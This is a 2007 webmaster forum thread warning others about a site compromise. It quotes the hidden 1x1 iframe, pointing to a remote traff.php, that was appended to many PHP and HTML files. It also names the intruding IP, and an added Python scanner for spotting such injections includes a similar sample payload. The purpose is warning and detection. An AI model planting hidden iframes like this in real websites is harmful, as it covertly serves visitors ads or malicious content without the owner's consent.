
JD45 09-25-2007 05:49 AM

Webmasters Beware!
 
Recently we noticed a full screen LG ad on our website. We only run Tribal Fusion and IntelliTxt and neither of those should be displaying a full screen ad.

We looked into it and this code was added to MANY of our php and html files:

Code:

<.iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'><./iframe>

The IP that illegally accessed our FTP is: 81.95.149.75

That IP comes back registered to Panama. I've already sent the abuse email a letter with proof. It appears we were somehow exploited and a mass script ran adding the code at the bottom of the files affected.

Just FYI for all.
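
Added example, not part of the original post: a small Python scanner a site owner could run over a web root to find files carrying the kind of hidden 1x1 iframe described above, and to tell whether it sits at the very bottom of the file. It assumes the dots in the posted tag were only there to stop the forum rendering it, so it matches a normal `<iframe>` tag; the function names, sample strings and the 203.0.113.5 address are constructed for illustration.

```python
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)
# Markers of an iframe meant to be invisible: width/height of 0 or 1, or hiding CSS.
TINY_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*['"]?[01](?:px)?['"]?(?=[\s>/])""", re.IGNORECASE)
HIDDEN_CSS_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SCAN_SUFFIXES = {".php", ".html", ".htm"}

# Constructed samples (documentation address, not the one from the thread).
INFECTED_SAMPLE = (
    "<?php echo 'hello'; ?>\n"
    "<html><body>page</body></html>\n"
    "<iframe src='http://203.0.113.5/traff.php' width='1' height='1' "
    "style='visibility:hidden'></iframe>\n"
)
CLEAN_SAMPLE = '<html><iframe src="/map.html" width="600" height="400"></iframe></html>\n'


def find_hidden_iframes(text):
    """Return (line_number, src, appended_at_eof) for each hidden iframe in text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if not (TINY_RE.search(tag) or HIDDEN_CSS_RE.search(tag)):
            continue  # visible iframe, e.g. an embedded map or video
        src = SRC_RE.search(tag)
        line = text.count("\n", 0, m.start()) + 1
        # Appended injection: only a closing </iframe> and whitespace follow the tag.
        tail = re.sub(r"</iframe\s*>", "", text[m.end():], flags=re.IGNORECASE)
        hits.append((line, src.group(1) if src else None, tail.strip() == ""))
    return hits


def scan_tree(root):
    """Walk a web root and map each affected file path to its hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = find_hidden_iframes(text)
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    import sys
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line, src, appended in hits:
            print(f"{name}:{line}: hidden iframe src={src} appended_at_eof={appended}")
```

Files it reports should be compared against a known-good backup or version control copy, since the scan only finds the symptom and not how the files were changed.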

manilodisan 09-25-2007 08:19 AM

How did it access your files? Can you share the story?

SEOvB 09-25-2007 02:36 PM

Obviously his server was compromised due to an exploit in some software being run.

JD45 09-25-2007 02:56 PM

Quote:

Originally Posted by FRDS (Post 1346819)
Obviously his server was compromised due to an exploit in some software being run.

exactly

SEOvB 09-25-2007 03:44 PM

Just wondering what all software besides vBulletin are you currently running?

JD45 09-25-2007 05:05 PM

Quote:

Originally Posted by FRDS (Post 1346880)
Just wondering what all software besides vBulletin are you currently running?

No other 'official' software or scripts. Our entire site besides vb is custom coded in php. Actually I take that back, we do run vbseo as well.


It doesn't seem as if it was directed to the forums, but more so PHP overall.

Marco van Herwaarden 09-25-2007 05:15 PM

Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files were changed from another account on the same server.

JD45 09-25-2007 05:51 PM

Quote:

Originally Posted by Marco van Herwaarden (Post 1346942)
Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files were changed from another account on the same server.

We're on a dedi server, but having ftp/shell access is a possibility.

I have to say it was pretty unique. First time I've seen anyone access a site and modify php files for a monetary gain.

Marco van Herwaarden 09-25-2007 06:17 PM

That happens all the time.

"Hackers" are not anymore what they used to be (just hacking for the thrill/kick). Hacks and exploits are being sold these days for commercial purposes.


All times are GMT.